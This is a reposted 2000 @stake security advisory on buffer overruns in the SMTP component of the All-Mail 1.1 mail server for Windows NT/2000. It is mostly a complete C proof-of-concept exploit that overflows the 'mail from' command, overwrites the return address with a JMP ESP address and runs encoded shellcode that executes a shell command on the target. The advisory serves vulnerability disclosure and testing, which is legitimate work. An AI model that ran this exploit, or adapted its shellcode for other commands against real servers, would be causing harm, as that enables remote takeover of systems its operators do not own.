[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : All-Mail buffer overrun vulnerability

Title: All-Mail buffer overrun vulnerability
Released by: @stake
Date: 12th October 2000
Printable version: Click here
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1





                              @stake Inc.

                            www.atstake.com



                           Security Advisory



Advisory Name: All-Mail buffer overrun vulnerability

 Release Date: 10/12/2000

  Application: Nevis Systems All-Mail 1.1

     Platform: Windows NT 4.0 / 2000

     Severity: There are several buffer overflow conditions

               that could result in execution of arbitrary

               code or a denial of service.

      Authors: David Litchfield [dlitchfield@atstake.com]

Vendor Status: Vendor alerted - details bellow.

          Web: www.atstake.com/research/advisories/2000/a101200-2.txt





Overview:



Nevis System's All-Mail (http://www.n-systems.com/) is a personal

and small office mail server written for the Windows platform. There are

various buffer overrun vulnerabilities in this server that can allow a

remote attacker to gain complete control of the server's execution and

execute arbitrary computer code.



There are a several methods that can be used to overflow various static

buffers in the SMTP component of the server for examples having an overly

long "mail from" or "rcpt to" command.



Proof of Concept



The following code will connect to TCP port 25 on the remote system and

then cause the overflow. The code executed here simply spawns a shell,

performs a directory listing and pipes the output to a file called

"allmail_orun.txt" on the target system. This will allow users to check if

their mail server is vulnerable by testing for the file.



Cut --------8<----------------------



#include 

#include 

#include 

#include 



struct sockaddr_in sa;

struct hostent *he;

SOCKET sock;

char hostname[256]="";



int main(int argc, char *argv[])

{

int chk=0,count=0;

char

buffer[500]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPP

PQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ11112222333344445555666677778888999

90000aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrr

rssssttttuuuuvvvvwwwwxxxxyy";



if(argc == 1)

{

printf("\n\tUsage: C:\\>%s host\n\tTests for

All-Mail buffer overflow\n\tDavid Litchfield 10th October

2000\n\n",argv[0]);

return 0;

}



strncpy(hostname,argv[1],250);



// Overwrite the saved return address with 0x77F32836

// This address contains a JMP ESP instruction that

// when executed will land us back in our buffer



buffer[242]=0x36;

buffer[243]=0x28;

buffer[244]=0xF3;

buffer[245]=0x77;



count = 246;



// This part of the buffer gets zapped - just put NOPs in



buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;

buffer[count++]=0x90;





// This is where our code starts in earnest



// mov esp,ebp

buffer[count++]=0x8B;

buffer[count++]=0xEC;



// With our stack perserved and our code safe we continue



// mov ebx,esp

buffer[count++]=0x8B;

buffer[count++]=0xDC;



// mov eax,77F1A986h

buffer[count++]=0xB8;

buffer[count++]=0x86;

buffer[count++]=0xA9;

buffer[count++]=0xF1;

buffer[count++]=0x77;



// xor esi,esi

buffer[count++]=0x33;

buffer[count++]=0xF6;



// push esi

buffer[count++]=0x56;



// mov ecx, 0xFFFFFFFF

buffer[count++]=0xB9;

buffer[count++]=0xFF;

buffer[count++]=0xFF;

buffer[count++]=0xFF;

buffer[count++]=0xFF;



// sub ecx, 0x0D7

buffer[count++]=0x83;

buffer[count++]=0xE9;

buffer[count++]=0xD7;



// loophere:



// sub dword ptr[ebx+0x50],1

buffer[count++]=0x83;

buffer[count++]=0x6B;

buffer[count++]=0x50;

buffer[count++]=0x01;



// sub ebx,1

buffer[count++]=0x83;

buffer[count++]=0xEB;

buffer[count++]=0x01;



// sub ecx,1

buffer[count++]=0x83;

buffer[count++]=0xE9;

buffer[count++]=0x01;



// test ecx,ecx

buffer[count++]=0x85;

buffer[count++]=0xC9;



// jne loophere

buffer[count++]=0x75;

buffer[count++]=0xF2;



// add ebx,0x55

buffer[count++]=0x83;

buffer[count++]=0xC3;

buffer[count++]=0x55;



// push ebx 

buffer[count++]=0x53;



// call eax

buffer[count++]=0xFF;

buffer[count++]=0xD0;



// This bunch is our command to run:

// cmd.exe /c dir > allmail_orun.txt

// but with 1 added to evey character

// which is SUBed in the loop above

buffer[count++]=0x01;

buffer[count++]=0x01;

buffer[count++]=0x01;

buffer[count++]=0x01;

buffer[count++]=0x64;

buffer[count++]=0x6e;

buffer[count++]=0x65;

buffer[count++]=0x2f;

buffer[count++]=0x66;

buffer[count++]=0x79;

buffer[count++]=0x66;

buffer[count++]=0x21;

buffer[count++]=0x30;

buffer[count++]=0x64;

buffer[count++]=0x21;

buffer[count++]=0x65;

buffer[count++]=0x6a;

buffer[count++]=0x73;

buffer[count++]=0x21;

buffer[count++]=0x3f;

buffer[count++]=0x21;

buffer[count++]=0x62;

buffer[count++]=0x6d;

buffer[count++]=0x6d;

buffer[count++]=0x6e;

buffer[count++]=0x62;

buffer[count++]=0x6a;

buffer[count++]=0x6d;

buffer[count++]=0x60;

buffer[count++]=0x70;

buffer[count++]=0x73;

buffer[count++]=0x76;

buffer[count++]=0x6f;

buffer[count++]=0x2f;

buffer[count++]=0x75;

buffer[count++]=0x79;

buffer[count++]=0x75;

buffer[count++]=0x01;

buffer[count++]=0x01;

buffer[count++]=0x01;





if(startWSOCK(hostname)!=0)

{

printf("Winsock Error!\n");

return 0;

}



DoBufferOverrun(buffer);



return 0;



} 







int startWSOCK(char *swhost)

{

int err=0;

WORD wVersionRequested;

WSADATA wsaData;



wVersionRequested = MAKEWORD( 2, 0 );

err = WSAStartup( wVersionRequested, &wsaData );

if ( err != 0 )

{



return 2;

}

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion )

!= 0 )

{

   WSACleanup( );

    return 3;

}



if ((he = gethostbyname(swhost)) == NULL)

{

printf("Host not found..");

return 4;

}

sa.sin_addr.s_addr=INADDR_ANY;

sa.sin_family=AF_INET;

memcpy(&sa.sin_addr,he->h_addr,he->h_length);



return 0;

} 



int DoBufferOverrun(char *exploit)

{



int snd, rcv, err, count =0,incount = 0; 

char resp[200],*loc=NULL;



sa.sin_port=htons(25);

sock=socket(AF_INET,SOCK_STREAM,0);

bind(sock,(struct sockaddr *)&sa,sizeof(sa));

if (sock==INVALID_SOCKET)

{

closesocket(sock);

return 0;

}



if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)

{



closesocket(sock);

printf("Failed to connect\n");

return 0;

}

else

{

rcv = recv(sock,resp,200,0);

snd = send(sock,"helo

all-mail.overrun.test\r\n",28,0);

rcv = recv(sock,resp,200,0);

loc = strstr(resp,"250 HELO accepted");

if(loc == NULL)

{

printf("Server does not appear to be

running All-Mail\nAborting...");

closesocket(sock);

return 0;

}

else

{

snd = send(sock,"mail from:

<",12,0);

snd =

send(sock,exploit,strlen(exploit),0);

snd = send(sock,">\r\n",3,0);

printf("Payload

sent...allmail_orun.txt should have been created.\n");

}

}



closesocket(sock);

return 0;

}



Cut -------8<---------





Vendor Response:



When informed of these issues the vendor has decided not to support

this product any longer and have stated they will inform their customers of

what they should do.



Recommendation:



Switch to another mail server as there will not be a fixed version

available.





For more advisories: http://www.atstake.com/research/index.html

PGP Key: http://www.atstake.com/research/pgp_key.asc



Copyright 2000 @stake, Inc. All rights reserved.





-----BEGIN PGP SIGNATURE-----

Version: PGP 7.0



iQA/AwUBOeXgbFESXwDtLdMhEQK7UACg5BBYYKzDSnXb6JnuffskVKGn2pUAoI1G

9TODImPMfmu4v87sWkw2sLjd

=YZd9

-----END PGP SIGNATURE-----








(C) 1999-2000 All rights reserved.